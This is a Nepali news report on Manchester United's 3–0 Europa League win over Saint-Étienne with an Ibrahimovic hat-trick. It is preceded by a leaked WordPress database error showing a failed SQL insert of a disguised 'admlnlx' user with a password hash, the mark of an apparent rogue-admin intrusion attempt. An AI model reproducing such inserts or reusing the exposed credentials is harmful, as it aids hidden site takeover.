WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BnQlizr.GNmtlOIjIaGaM0yNQ7HYMU1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 18:22:25', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागुन ६–
जाल्टन इब्राहिमोभिकको ह्याट्रिक गोलको सहयोगले इङ्लिस क्लब म्यानचेस्टर युनाइटेडले फ्रान्सको सेन्ट–इटिन क्लबलाई युरोपा लिगको समूह–३२ को पहिलो लेगको खेलमा ३–० ले पराजित गरेको छ।
इब्राहिमोभिकले १५ मिनेटमा फ्रिकिकमार्फत गोल गर्दै पहिलो हाफमै घरेलु टोलीलाई अग्रता दिलाएका थिए। उनले दोस्रो हाफको ७५ मिनेटमा मार्कुस रसफोर्डको पासमा अर्को गोल गरेका थिए। तेस्रो गोल ८८ मिनेटमा पेनाल्टीबाट सम्भव भएको थियो।
३५ वर्षीय जाल्टनको म्यानचेस्टरबाट यस सिजन २३ औ गोल थियो। युभेन्ट्स, बार्सिलोना र एसी मिलानबाट व्यवसायिक फुटबल खेलिसकेका जाल्टनको युरोपेली फुटबलमा यो १७ औं ह्याट्रिक पनि थियो।
म्यानचेस्टर युनाइटेडले क्लब फुटबलमा थुप्रै उपाधि घर भित्र्याए पनि युरोपा लिग जितेको छैन्। यसै वर्ष जाल्टनलाई क्लबमा भित्र्याएको रेड डेभिल्सका लागि विहिबार रातीको विजयसँगै पहिलो पल्ट लिग जित्ने सम्भावना बढेर गएको छ।
म्यानचेस्टरले ‘अवे’ खेलको रुपमा २२ तारिखमा फ्रेन्च क्लबसँग पुनः भिड्ने छ।